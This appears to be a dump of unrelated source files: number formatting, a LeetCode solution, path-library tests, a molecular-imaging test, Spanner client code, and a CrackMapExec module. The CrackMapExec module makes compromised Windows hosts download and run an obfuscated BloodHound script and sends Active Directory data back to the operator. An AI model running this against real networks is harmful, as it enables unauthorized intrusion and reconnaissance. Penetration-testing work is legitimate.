if leader == '1' and cleanup:
leader = ''
else:
# add multiply sign
leader += u'\u00d7'
return '%s10^{%i}' % (leader, int(exponent))
def formatSciNotation(num, formatargs, locale=None):
"""Format number into form X \times 10^{Y}.
This function trims trailing zeros and decimal point unless a formatting
argument is supplied
This is similar to the %e format string
formatargs is the standard argument in a format string to control the
number of decimal places, etc.
locale is a QLocale object
"""
# handle nan, inf, -inf
if not N.isfinite(num):
return str(num)
# create an initial formatting string
if formatargs:
formatstr = '%' + formatargs + 'e'
else:
formatstr = '%.10e'
# do formatting, catching errors
try:
text = formatstr % num
except:
return _formaterror
text = sciToHuman(text, cleanup=formatargs=='')
# do substitution of decimals
if locale is not None:
text = text.replace('.', locale.decimalPoint())
return text
def formatGeneral(num, fmtarg, locale=None):
"""General formatting which switches from normal to scientic
notation."""
if fmtarg:
# if an argument is given, we convert output
try:
retn = ('%'+fmtarg+'g') % num
except ValueError:
retn = _formaterror
if retn.find('e') >= 0:
# in scientific notation, so convert
retn = sciToHuman(retn, cleanup=False)
else:
a = abs(num)
# manually choose when to switch from normal to scientific
# as the default %g isn't very good
if a >= 1e4 or (a < 1e-2 and a > 1e-110):
retn = formatSciNotation(num, fmtarg, locale=locale)
else:
retn = '%.10g' % num
if locale is not None:
# replace decimal point with correct decimal point
retn = retn.replace('.', locale.decimalPoint())
return retn
engsuffixes = ( 'y', 'z', 'a', 'f', 'p', 'n',
u'\u03bc', 'm', '', 'k', 'M', 'G',
'T', 'P', 'E', 'Z', 'Y' )
def formatEngineering(num, fmtarg, locale=None):
"""Engineering suffix format notation using SI suffixes."""
if num != 0.:
logindex = math.log10( abs(num) ) / 3.
# for numbers < 1 round down suffix
if logindex < 0. and (int(logindex)-logindex) > 1e-6:
logindex -= 1
# make sure we don't go out of bounds
logindex = min( max(logindex, -8),
len(engsuffixes) - 9 )
suffix = engsuffixes[ int(logindex) + 8 ]
val = num / 10**( int(logindex) *3)
else:
suffix = ''
val = num
text = ('%' + fmtarg + 'g%s') % (val, suffix)
if locale is not None:
text = text.replace('.', locale.decimalPoint())
return text
# catch general veusz formatting expression
_formatRE = re.compile(r'%([-0-9.+# ]*)(VDVS|VD.|V.|[A-Za-z%])')
def formatNumber(num, formatstr, locale=None):
""" Format a number in different ways.
formatstr is a standard C format string, with some additions:
%Ve scientific notation X \times 10^{Y}
%Vg switches from normal notation to scientific outside 10^-2 to 10^4
%VE engineering suffix option
%VDx date formatting, where x is one of the arguments in
http://docs.python.org/lib/module-time.html in the function
strftime
"""
outitems = []
while formatstr:
# repeatedly try to do string format
match = _formatRE.search(formatstr)
if not match:
outitems.append(formatstr)
break
# argument and type of formatting
farg, ftype = match.groups()
# special veusz formatting
if ftype[:1] == 'V':
# special veusz formatting
if ftype == 'Ve':
out = formatSciNotation(num, farg, locale=locale)
elif ftype == 'Vg':
out = formatGeneral(num, farg, locale=locale)
elif ftype == 'VE':
out = formatEngineering(num, farg, locale=locale)
elif ftype[:2] == 'VD':
d = dates.floatToDateTime(num)
# date formatting (seconds since start of epoch)
if ftype[:4] == 'VDVS':
# special seconds operator
out = ('%'+ftype[4:]+'g') % (d.second+d.microsecond*1e-6)
else:
# use date formatting
try:
out = d.strftime(str('%'+ftype[2:]))
except ValueError:
out = _formaterror
else:
out = _formaterror
# replace hyphen with true minus sign
out = out.replace('-', u'\u2212')
elif ftype == '%':
out = '%'
else:
# standard C formatting
try:
out = localeFormat('%' + farg + ftype, (num,),
locale=locale)
except:
out = _formaterror
outitems.append(formatstr[:match.start()])
outitems.append(out)
formatstr = formatstr[match.end():]
return ''.join(outitems)
| gpl-2.0 | -4,821,300,512,050,054,000 | 31.146341 | 79 | 0.570182 | false |
yaoxuanw007/forfun | leetcode/python/textJustification.py | 1 | 1833 | # https://oj.leetcode.com/problems/text-justification/
class Solution:
# @param words, a list of strings
# @param L, an integer
# @return a list of strings
def fullJustify(self, words, L):
count, line, lines = 0, [], []
for word in words:
count += len(word)
if count > L:
count -= len(word)
lines.append(self.createLine(L, line, count, False))
# prepare for next line
line = [word]
count = len(word) + 1
else:
line.append(word)
count += 1
# special case: words is empty
if len(words) > 0:
lines.append(self.createLine(L, line, count, True))
# print [len(x) for x in lines]
return lines
# generate each line
def createLine(self, L, line, count, isLastLine):
# add every one space back
extraLen = L - count + len(line)
slotCount = len(line) - 1
# special case: one word per line
if slotCount == 0:
slotLen = 0
extraCount = 0
# special case: last line (multiple words)
elif isLastLine:
slotLen = 1
extraCount = 0
extraLen -= len(line)
else:
slotLen = extraLen / slotCount
extraCount = extraLen % slotCount
extraLen = 0
# process current line
currLine = ""
for currWord in line:
currLine += currWord
currLine += (" " * slotLen)
if extraCount > 0:
currLine += " "
extraCount -= 1
currLine += (" " * extraLen)
# special case: one word in non-last line
if slotCount > 0 and not isLastLine:
# remove last slotLen
return currLine[:-1*slotLen]
else:
return currLine
s = Solution()
print s.fullJustify(["This", "is", "an", "example", "of", "text", "justification."], 16)
print s.fullJustify([], 16)
print s.fullJustify(["What","must","be","shall","be."], 12)
| mit | -2,375,941,334,285,857,000 | 25.565217 | 88 | 0.585379 | false |
strogo/djpcms | djpcms/utils/unipath/test.py | 1 | 19686 | #!/usr/bin/env python
"""Unit tests for unipath.py and unipath_purist.py
Environment variables:
DUMP : List the contents of test direcories after each test.
NO_CLEANUP : Don't delete test directories.
(These are not command-line args due to the difficulty of merging my args
with unittest's.)
IMPORTANT: Tests may not assume what the current directory is because the tests
may have been started from anywhere, and some tests chdir to the temprorary
test directory which is then deleted.
"""
import ntpath
import os
import posixpath
import tempfile
import time
import sys
from nose.tools import eq_, raises
# Package imports
from djpcms.utils.unipath import *
from djpcms.utils.unipath.errors import *
from djpcms.utils.unipath.tools import dict2dir, dump_path
AbstractPath.auto_norm = False
class PosixPath(AbstractPath):
pathlib = posixpath
class NTPath(AbstractPath):
pathlib = ntpath
# Global flags
cleanup = not bool(os.environ.get("NO_CLEANUP"))
dump = bool(os.environ.get("DUMP"))
def r(exception, func, *args, **kw):
"""This is supposed to exist in nose.tools as assert_raises(), but it
doesn't.
"""
try:
func(*args, **kw)
except exception:
pass
except Exception, e:
tup = exception.__name__, e.__class__.__name__, e
raise AssertionError("expected %s, caught %s: %s" % tup)
else:
raise AssertionError("function didn't raise %s" % exception.__name__)
class TestPathConstructor(object):
def test_posix(self):
eq_(str(PosixPath()), posixpath.curdir)
eq_(str(PosixPath("foo/bar.py")), "foo/bar.py")
eq_(str(PosixPath("foo", "bar.py")), "foo/bar.py")
eq_(str(PosixPath("foo", "bar", "baz.py")), "foo/bar/baz.py")
eq_(str(PosixPath("foo", PosixPath("bar", "baz.py"))), "foo/bar/baz.py")
eq_(str(PosixPath("foo", ["", "bar", "baz.py"])), "foo/bar/baz.py")
eq_(str(PosixPath("")), "")
eq_(str(PosixPath()), ".")
eq_(str(PosixPath("foo", 1, "bar")), "foo/1/bar")
def test_nt(self):
eq_(str(NTPath()), ntpath.curdir)
eq_(str(NTPath(r"foo\bar.py")), r"foo\bar.py")
eq_(str(NTPath("foo", "bar.py")), r"foo\bar.py")
eq_(str(NTPath("foo", "bar", "baz.py")), r"foo\bar\baz.py")
eq_(str(NTPath("foo", NTPath("bar", "baz.py"))), r"foo\bar\baz.py")
eq_(str(NTPath("foo", ["", "bar", "baz.py"])), r"foo\bar\baz.py")
eq_(str(PosixPath("")), "")
eq_(str(NTPath()), ".")
eq_(str(NTPath("foo", 1, "bar")), r"foo\1\bar")
class TestNorm(object):
def test_posix(self):
eq_(PosixPath("a//b/../c").norm(), "a/c")
eq_(PosixPath("a/./b").norm(), "a/b")
eq_(PosixPath("a/./b", norm=True), "a/b")
eq_(PosixPath("a/./b", norm=False), "a/./b")
class AutoNormPath(PosixPath):
auto_norm = True
eq_(AutoNormPath("a/./b"), "a/b")
eq_(AutoNormPath("a/./b", norm=True), "a/b")
eq_(AutoNormPath("a/./b", norm=False), "a/./b")
def test_nt(self):
eq_(NTPath(r"a\\b\..\c").norm(), r"a\c")
eq_(NTPath(r"a\.\b").norm(), r"a\b")
eq_(NTPath("a\\.\\b", norm=True), "a\\b")
eq_(NTPath("a\\.\\b", norm=False), "a\\.\\b")
class AutoNormPath(NTPath):
auto_norm = True
eq_(AutoNormPath("a\\.\\b"), "a\\b")
eq_(AutoNormPath("a\\.\\b", norm=True), "a\\b")
eq_(AutoNormPath("a\\.\\b", norm=False), "a\\.\\b")
class TestAbstractPath(object):
def test_repr(self):
eq_(repr(Path("la_la_la")), "Path('la_la_la')")
eq_(repr(NTPath("la_la_la")), "NTPath('la_la_la')")
# Not testing expand_user, expand_vars, or expand: too dependent on the
# OS environment.
def test_properties(self):
p = PosixPath("/first/second/third.jpg")
eq_(p.parent, "/first/second")
eq_(p.name, "third.jpg")
eq_(p.ext, ".jpg")
eq_(p.stem, "third")
def test_properties2(self):
# Usage sample in README is based on this.
p = PosixPath("/usr/lib/python2.5/gopherlib.py")
eq_(p.parent, Path("/usr/lib/python2.5"))
eq_(p.name, Path("gopherlib.py"))
eq_(p.ext, ".py")
eq_(p.stem, Path("gopherlib"))
q = PosixPath(p.parent, p.stem + p.ext)
eq_(q, p)
def test_split_root(self):
eq_(PosixPath("foo/bar.py").split_root(), ("", "foo/bar.py"))
eq_(PosixPath("/foo/bar.py").split_root(), ("/", "foo/bar.py"))
eq_(NTPath("foo\\bar.py").split_root(), ("", "foo\\bar.py"))
eq_(NTPath("\\foo\\bar.py").split_root(), ("\\", "foo\\bar.py"))
eq_(NTPath("C:\\foo\\bar.py").split_root(), ("C:\\", "foo\\bar.py"))
eq_(NTPath("C:foo\\bar.py").split_root(), ("C:", "foo\\bar.py"))
eq_(NTPath("\\\\share\\base\\foo\\bar.py").split_root(), ("\\\\share\\base\\", "foo\\bar.py"))
def test_split_root_vs_isabsolute(self):
assert not PosixPath("a/b/c").isabsolute()
assert not PosixPath("a/b/c").split_root()[0]
assert PosixPath("/a/b/c").isabsolute()
assert PosixPath("/a/b/c").split_root()[0]
assert not NTPath("a\\b\\c").isabsolute()
assert not NTPath("a\\b\\c").split_root()[0]
assert NTPath("\\a\\b\\c").isabsolute()
assert NTPath("\\a\\b\\c").split_root()[0]
assert NTPath("C:\\a\\b\\c").isabsolute()
assert NTPath("C:\\a\\b\\c").split_root()[0]
assert NTPath("C:a\\b\\c").isabsolute()
assert NTPath("C:a\\b\\c").split_root()[0]
assert NTPath("\\\\share\\b\\c").isabsolute()
assert NTPath("\\\\share\\b\\c").split_root()[0]
def test_components(self):
P = PosixPath
eq_(P("a").components(), [P(""), P("a")])
eq_(P("a/b/c").components(), [P(""), P("a"), P("b"), P("c")])
eq_(P("/a/b/c").components(), [P("/"), P("a"), P("b"), P("c")])
P = NTPath
eq_(P("a\\b\\c").components(), [P(""), P("a"), P("b"), P("c")])
eq_(P("\\a\\b\\c").components(), [P("\\"), P("a"), P("b"), P("c")])
eq_(P("C:\\a\\b\\c").components(), [P("C:\\"), P("a"), P("b"), P("c")])
eq_(P("C:a\\b\\c").components(), [P("C:"), P("a"), P("b"), P("c")])
eq_(P("\\\\share\\b\\c").components(), [P("\\\\share\\b\\"), P("c")])
def test_child(self):
PosixPath("foo/bar").child("baz")
r(UnsafePathError, PosixPath("foo/bar").child, "baz/fred")
r(UnsafePathError, PosixPath("foo/bar").child, "..", "baz")
r(UnsafePathError, PosixPath("foo/bar").child, ".", "baz")
class TestStringMethods(object):
def test_add(self):
P = PosixPath
eq_(P("a") + P("b"), P("ab"))
eq_(P("a") + "b", P("ab"))
eq_("a" + P("b"), P("ab"))
class FilesystemTest(object):
TEST_HIERARCHY = {
"a_file": "Nothing important.",
"animals": {
"elephant": "large",
"gonzo": "unique",
"mouse": "small"},
"images": {
"image1.gif": "",
"image2.jpg": "",
"image3.png": ""},
"swedish": {
"chef": {
"bork": {
"bork": "bork!"}}},
}
def setUp(self):
self.d = d = Path(tempfile.mkdtemp())
dict2dir(d, self.TEST_HIERARCHY)
self.a_file = Path(d, "a_file")
self.animals = Path(d, "animals")
self.images = Path(d, "images")
self.chef = Path(d, "swedish", "chef", "bork", "bork")
if hasattr(self.d, "write_link"):
self.link_to_chef_file = Path(d, "link_to_chef_file")
self.link_to_chef_file.write_link(self.chef)
self.link_to_images_dir = Path(d, "link_to_images_dir")
self.link_to_images_dir.write_link(self.images)
self.dead_link = self.d.child("dead_link")
self.dead_link.write_link("nowhere")
self.missing = Path(d, "MISSING")
self.d.chdir()
def tearDown(self):
d = self.d
d.parent.chdir() # Always need a valid curdir to avoid OSErrors.
if dump:
dump_path(d)
if cleanup:
d.rmtree()
if d.exists():
raise AssertionError("unable to delete temp dir %s" % d)
else:
print "Not deleting test directory", d
class TestCalculatingPaths(FilesystemTest):
def test_inheritance(self):
assert Path.cwd().name # Can we access the property?
def test_cwd(self):
eq_(str(Path.cwd()), os.getcwd())
def test_chdir_absolute_relative(self):
save_dir = Path.cwd()
self.d.chdir()
eq_(Path.cwd(), self.d)
eq_(Path("swedish").absolute(), Path(self.d, "swedish"))
save_dir.chdir()
eq_(Path.cwd(), save_dir)
def test_chef(self):
p = Path(self.d, "swedish", "chef", "bork", "bork")
eq_(p.read_file(), "bork!")
def test_absolute(self):
p1 = Path("images").absolute()
p2 = self.d.child("images")
eq_(p1, p2)
def test_relative(self):
p = self.d.child("images").relative()
eq_(p, "images")
def test_resolve(self):
p1 = Path(self.link_to_images_dir, "image3.png")
p2 = p1.resolve()
eq_(p1.components()[-2:], ["link_to_images_dir", "image3.png"])
eq_(p2.components()[-2:], ["images", "image3.png"])
assert p1.exists()
assert p2.exists()
assert p1.same_file(p2)
assert p2.same_file(p1)
class TestRelPathTo(FilesystemTest):
def test1(self):
p1 = Path("animals", "elephant")
p2 = Path("animals", "mouse")
eq_(p1.rel_path_to(p2), Path("mouse"))
def test2(self):
p1 = Path("animals", "elephant")
p2 = Path("images", "image1.gif")
eq_(p1.rel_path_to(p2), Path(os.path.pardir, "images", "image1.gif"))
def test3(self):
p1 = Path("animals", "elephant")
eq_(p1.rel_path_to(self.d), Path(os.path.pardir))
def test3(self):
p1 = Path("swedish", "chef")
eq_(p1.rel_path_to(self.d), Path(os.path.pardir, os.path.pardir))
class TestListingDirectories(FilesystemTest):
def test_listdir_names_only(self):
result = self.images.listdir(names_only=True)
control = ["image1.gif", "image2.jpg", "image3.png"]
eq_(result, control)
def test_listdir_arg_errors(self):
r(TypeError, self.d.listdir, filter=FILES, names_only=True)
def test_listdir(self):
result = Path("images").listdir()
control = [
Path("images", "image1.gif"),
Path("images", "image2.jpg"),
Path("images", "image3.png")]
eq_(result, control)
def test_listdir_all(self):
result = Path("").listdir()
control = [
"a_file",
"animals",
"dead_link",
"images",
"link_to_chef_file",
"link_to_images_dir",
"swedish",
]
eq_(result, control)
def test_listdir_files(self):
result = Path("").listdir(filter=FILES)
control = [
"a_file",
"link_to_chef_file",
]
eq_(result, control)
def test_listdir_dirs(self):
result = Path("").listdir(filter=DIRS)
control = [
"animals",
"images",
"link_to_images_dir",
"swedish",
]
eq_(result, control)
def test_listdir_links(self):
if not hasattr(self.d, "symlink"):
return
result = Path("").listdir(filter=LINKS)
control = [
"dead_link",
"link_to_chef_file",
"link_to_images_dir",
]
eq_(result, control)
def test_listdir_files_no_links(self):
result = Path("").listdir(filter=FILES_NO_LINKS)
control = [
"a_file",
]
eq_(result, control)
def test_listdir_dirs_no_links(self):
result = Path("").listdir(filter=DIRS_NO_LINKS)
control = [
"animals",
"images",
"swedish",
]
eq_(result, control)
def test_listdir_dead_links(self):
result = Path("").listdir(filter=DEAD_LINKS)
control = [
"dead_link",
]
eq_(result, control)
def test_listdir_pattern_names_only(self):
result = self.images.name.listdir("*.jpg", names_only=True)
control = ["image2.jpg"]
eq_(result, control)
def test_listdir_pattern(self):
result = self.images.name.listdir("*.jpg")
control = [Path("images", "image2.jpg")]
eq_(result, control)
def test_walk(self):
result = list(self.d.walk())
control = [
Path(self.a_file),
Path(self.animals),
Path(self.animals, "elephant"),
Path(self.animals, "gonzo"),
Path(self.animals, "mouse"),
]
result = result[:len(control)]
eq_(result, control)
def test_walk_bottom_up(self):
result = list(self.d.walk(top_down=False))
control = [
Path(self.a_file),
Path(self.animals, "elephant"),
Path(self.animals, "gonzo"),
Path(self.animals, "mouse"),
Path(self.animals),
]
result = result[:len(control)]
eq_(result, control)
def test_walk_files(self):
result = list(self.d.walk(filter=FILES))
control = [
Path(self.a_file),
Path(self.animals, "elephant"),
Path(self.animals, "gonzo"),
Path(self.animals, "mouse"),
Path(self.images, "image1.gif"),
]
result = result[:len(control)]
eq_(result, control)
def test_walk_dirs(self):
result = list(self.d.walk(filter=DIRS))
control = [
Path(self.animals),
Path(self.images),
Path(self.link_to_images_dir),
Path(self.d, "swedish"),
]
result = result[:len(control)]
eq_(result, control)
def test_walk_links(self):
result = list(self.d.walk(filter=LINKS))
control = [
Path(self.dead_link),
Path(self.link_to_chef_file),
Path(self.link_to_images_dir),
]
result = result[:len(control)]
eq_(result, control)
class TestStatAttributes(FilesystemTest):
def test_exists(self):
assert self.a_file.exists()
assert self.images.exists()
assert self.link_to_chef_file.exists()
assert self.link_to_images_dir.exists()
assert not self.dead_link.exists()
assert not self.missing.exists()
def test_lexists(self):
assert self.a_file.lexists()
assert self.images.lexists()
assert self.link_to_chef_file.lexists()
assert self.link_to_images_dir.lexists()
assert self.dead_link.lexists()
assert not self.missing.lexists()
def test_isfile(self):
assert self.a_file.isfile()
assert not self.images.isfile()
assert self.link_to_chef_file.isfile()
assert not self.link_to_images_dir.isfile()
assert not self.dead_link.isfile()
assert not self.missing.isfile()
def test_isdir(self):
assert not self.a_file.isdir()
assert self.images.isdir()
assert not self.link_to_chef_file.isdir()
assert self.link_to_images_dir.isdir()
assert not self.dead_link.isdir()
assert not self.missing.isdir()
def test_islink(self):
assert not self.a_file.islink()
assert not self.images.islink()
assert self.link_to_chef_file.islink()
assert self.link_to_images_dir.islink()
assert self.dead_link.islink()
assert not self.missing.islink()
def test_ismount(self):
# Can't test on a real mount point because we don't know where it is
assert not self.a_file.ismount()
assert not self.images.ismount()
assert not self.link_to_chef_file.ismount()
assert not self.link_to_images_dir.ismount()
assert not self.dead_link.ismount()
assert not self.missing.ismount()
def test_times(self):
assert self.a_file.atime(), 50000
assert self.a_file.ctime(), 50000
assert self.a_file.mtime(), 50000
def test_size(self):
eq_(self.chef.size(), 5)
def test_same_file(self):
if hasattr(self.a_file, "same_file"):
control = Path(self.d, "a_file")
assert self.a_file.same_file(control)
assert not self.a_file.same_file(self.chef)
def test_stat(self):
st = self.chef.stat()
assert hasattr(st, "st_mode")
def test_statvfs(self):
if hasattr(self.images, "statvfs"):
stv = self.images.statvfs()
assert hasattr(stv, "f_files")
def test_chmod(self):
self.a_file.chmod(0600)
newmode = self.a_file.stat().st_mode
eq_(newmode & 0777, 0600)
# Can't test chown: requires root privilege and knowledge of local users.
def set_times(self):
self.a_file.set_times()
self.a_file.set_times(50000)
self.a_file.set_times(50000, 60000)
class TestCreateRenameRemove(FilesystemTest):
def test_mkdir_and_rmdir(self):
self.missing.mkdir()
assert self.missing.isdir()
self.missing.rmdir()
assert not self.missing.exists()
def test_mkdir_and_rmdir_with_parents(self):
abc = Path(self.d, "a", "b", "c")
abc.mkdir(parents=True)
assert abc.isdir()
abc.rmdir(parents=True)
assert not Path(self.d, "a").exists()
def test_remove(self):
self.a_file.remove()
assert not self.a_file.exists()
self.missing.remove() # Removing a nonexistent file should succeed.
def test_rename(self):
a_file = self.a_file
b_file = Path(a_file.parent, "b_file")
a_file.rename(b_file)
assert not a_file.exists()
assert b_file.exists()
def test_rename_with_parents(self):
pass # @@MO: Write later.
class TestLinks(FilesystemTest):
# @@MO: Write test_hardlink, test_symlink, test_write_link later.
def test_read_link(self):
eq_(self.dead_link.read_link(), "nowhere")
class TestHighLevel(FilesystemTest):
def test_copy(self):
a_file = self.a_file
b_file = Path(a_file.parent, "b_file")
a_file.copy(b_file)
assert b_file.exists()
a_file.copy_stat(b_file)
def test_copy_tree(self):
return # .copy_tree() not implemented.
images = self.images
images2 = Path(self.images.parent, "images2")
images.copy_tree(images2)
def test_move(self):
a_file = self.a_file
b_file = Path(a_file.parent, "b_file")
a_file.move(b_file)
assert not a_file.exists()
assert b_file.exists()
def test_needs_update(self):
control_files = self.images.listdir()
self.a_file.set_times()
assert not self.a_file.needs_update(control_files)
time.sleep(1)
control = Path(self.images, "image2.jpg")
control.set_times()
result = self.a_file.needs_update(self.images.listdir())
assert self.a_file.needs_update(control_files)
def test_read_file(self):
eq_(self.chef.read_file(), "bork!")
# .write_file and .rmtree tested in .setUp.
| bsd-3-clause | 8,344,402,886,396,129,000 | 31.974874 | 102 | 0.5414 | false |
jorik041/CrackMapExec | cme/modules/bloodhound.py | 1 | 6435 | from cme.helpers.powershell import *
from cme.helpers.misc import validate_ntlm
from cme.helpers.logger import write_log
from sys import exit
class CMEModule:
'''
Executes the BloodHound recon script on the target and retreives the results onto the attackers' machine
2 supported modes :
CSV : exports data into CSVs on the target file system before retreiving them (NOT opsec safe)
Neo4j API : exports data directly to the Neo4j API (opsec safe)
Module by Waffle-Wrath
Bloodhound.ps1 script base : https://github.com/BloodHoundAD/BloodHound
'''
name = 'bloodhound'
description = 'Executes the BloodHound recon script on the target and retreives the results to the attackers\' machine'
supported_protocols = ['smb']
opsec_safe= False
multiple_hosts = False
def options(self, context, module_options):
'''
THREADS Max numbers of threads to execute on target (defaults to 20)
COLLECTIONMETHOD Method used by BloodHound ingestor to collect data (defaults to 'Default')
CSVPATH (optional) Path where csv files will be written on target (defaults to C:\)
NEO4JURI (optional) URI for direct Neo4j ingestion (defaults to blank)
NEO4JUSER (optional) Username for direct Neo4j ingestion
NEO4JPASS (optional) Pass for direct Neo4j ingestion
Give NEO4J options to perform direct Neo4j ingestion (no CSVs on target)
'''
self.threads = 3
self.csv_path = 'C:\\'
self.collection_method = 'Default'
self.neo4j_URI = ""
self.neo4j_user = ""
self.neo4j_pass = ""
if module_options and 'THREADS' in module_options:
self.threads = module_options['THREADS']
if module_options and 'CSVPATH' in module_options:
self.csv_path = module_options['CSVPATH']
if module_options and 'COLLECTIONMETHOD' in module_options:
self.collection_method = module_options['COLLECTIONMETHOD']
if module_options and 'NEO4JURI' in module_options:
self.neo4j_URI = module_options['NEO4JURI']
if module_options and 'NEO4JUSER' in module_options:
self.neo4j_user = module_options['NEO4JUSER']
if module_options and 'NEO4JPASS' in module_options:
self.neo4j_pass = module_options['NEO4JPASS']
if self.neo4j_URI != "" and self.neo4j_user != "" and self.neo4j_pass != "" :
self.opsec_safe= True
self.ps_script = obfs_ps_script('BloodHound-modified.ps1')
def on_admin_login(self, context, connection):
if self.neo4j_URI == "" and self.neo4j_user == "" and self.neo4j_pass == "" :
command = "Invoke-BloodHound -CSVFolder '{}' -Throttle '{}' -CollectionMethod '{}'".format(self.csv_path, self.threads, self.collection_method)
else :
command = 'Invoke-BloodHound -URI {} -UserPass "{}:{}" -Throttle {} -CollectionMethod {}'.format(self.neo4j_URI, self.neo4j_user, self.neo4j_pass, self.threads, self.collection_method)
launcher = gen_ps_iex_cradle(context, 'BloodHound-modified.ps1', command)
connection.ps_execute(launcher)
context.log.success('Executed launcher')
def on_request(self, context, request):
if 'BloodHound-modified.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script.encode())
context.log.success('Executing payload... this can take a few minutes...')
else:
request.send_response(404)
request.end_headers()
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.get('content-length'))
data = response.rfile.read(length).decode()
response.stop_tracking_host()
if self.neo4j_URI == "" and self.neo4j_user == "" and self.neo4j_pass == "" :
self.parse_ouput(data, context, response)
context.log.success("Successfully retreived data")
def parse_ouput(self, data, context, response):
'''
Parse the output from Invoke-BloodHound
'''
parsedData = data.split("!-!")
nameList = ['user_sessions', 'group_membership.csv', 'acls.csv', 'local_admins.csv', 'trusts.csv']
for x in range(0, len(parsedData)):
if "ComputerName" in parsedData[x] and "UserName" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[0], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "GroupName" in parsedData[x] and "AccountName" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[1], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "ComputerName" in parsedData[x] and "AccountName" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[3], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "SourceDomain" in parsedData[x] and "TrustType" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[4], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "ObjectName" in parsedData[x] and "ObjectType" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[2], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name)) | bsd-2-clause | -7,558,939,601,482,193,000 | 54.482759 | 196 | 0.605905 | false |
shanot/imp | modules/em/test/test_pad_margin.py | 2 | 1482 | from __future__ import print_function
import os
import IMP
import IMP.em
import IMP.test
import IMP.core
class Tests(IMP.test.TestCase):
"""Class to test EM correlation restraint"""
def load_density_maps(self):
mrw = IMP.em.MRCReaderWriter()
self.scene = IMP.em.read_map(
self.get_input_file_name("1z5s_20.imp.mrc"),
mrw)
self.scene.get_header_writable().set_resolution(20.)
self.scene.update_voxel_size(2.5)
self.scene.calcRMS()
def setUp(self):
"""Build test model and optimizer"""
IMP.test.TestCase.setUp(self)
self.imp_model = IMP.Model()
self.load_density_maps()
def test_pad_margin(self):
"""Test the pad_margin function"""
scene_padded = self.scene.pad_margin(3, 3, 3)
self.scene.calcRMS()
scene_padded.calcRMS()
# test that the centers are the same
padded_h = scene_padded.get_header()
h = self.scene.get_header()
apix = h.get_spacing()
scene_center = self.scene.get_centroid(0.1)
padded_scene_center = scene_padded.get_centroid(0.1)
print(scene_center, padded_scene_center)
print(IMP.algebra.get_distance(padded_scene_center, scene_center))
self.assertAlmostEqual(
IMP.algebra.get_distance(
padded_scene_center,
scene_center),
0,
1)
if __name__ == '__main__':
IMP.test.main()
| gpl-3.0 | -3,142,320,444,239,026,700 | 28.058824 | 74 | 0.593117 | false |
tseaver/gcloud-python | spanner/google/cloud/spanner_v1/snapshot.py | 1 | 17350 | # Copyright 2016 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Model a set of read-only queries to a database as a snapshot."""
import functools
from google.protobuf.struct_pb2 import Struct
from google.cloud.spanner_v1.proto.transaction_pb2 import TransactionOptions
from google.cloud.spanner_v1.proto.transaction_pb2 import TransactionSelector
from google.api_core.exceptions import ServiceUnavailable
from google.cloud._helpers import _datetime_to_pb_timestamp
from google.cloud._helpers import _timedelta_to_duration_pb
from google.cloud.spanner_v1._helpers import _make_value_pb
from google.cloud.spanner_v1._helpers import _metadata_with_prefix
from google.cloud.spanner_v1._helpers import _SessionWrapper
from google.cloud.spanner_v1.streamed import StreamedResultSet
from google.cloud.spanner_v1.types import PartitionOptions
def _restart_on_unavailable(restart):
"""Restart iteration after :exc:`.ServiceUnavailable`.
:type restart: callable
:param restart: curried function returning iterator
"""
resume_token = b''
item_buffer = []
iterator = restart()
while True:
try:
for item in iterator:
item_buffer.append(item)
if item.resume_token:
resume_token = item.resume_token
break
except ServiceUnavailable:
del item_buffer[:]
iterator = restart(resume_token=resume_token)
continue
if len(item_buffer) == 0:
break
for item in item_buffer:
yield item
del item_buffer[:]
class _SnapshotBase(_SessionWrapper):
"""Base class for Snapshot.
Allows reuse of API request methods with different transaction selector.
:type session: :class:`~google.cloud.spanner_v1.session.Session`
:param session: the session used to perform the commit
"""
_multi_use = False
_transaction_id = None
_read_request_count = 0
def _make_txn_selector(self): # pylint: disable=redundant-returns-doc
"""Helper for :meth:`read` / :meth:`execute_sql`.
Subclasses must override, returning an instance of
:class:`transaction_pb2.TransactionSelector`
appropriate for making ``read`` / ``execute_sql`` requests
:raises: NotImplementedError, always
"""
raise NotImplementedError
def read(self, table, columns, keyset, index='', limit=0, partition=None):
"""Perform a ``StreamingRead`` API request for rows in a table.
:type table: str
:param table: name of the table from which to fetch data
:type columns: list of str
:param columns: names of columns to be retrieved
:type keyset: :class:`~google.cloud.spanner_v1.keyset.KeySet`
:param keyset: keys / ranges identifying rows to be retrieved
:type index: str
:param index: (Optional) name of index to use, rather than the
table's primary key
:type limit: int
:param limit: (Optional) maximum number of rows to return.
Incompatible with ``partition``.
:type partition: bytes
:param partition: (Optional) one of the partition tokens returned
from :meth:`partition_read`. Incompatible with
``limit``.
:rtype: :class:`~google.cloud.spanner_v1.streamed.StreamedResultSet`
:returns: a result set instance which can be used to consume rows.
:raises ValueError:
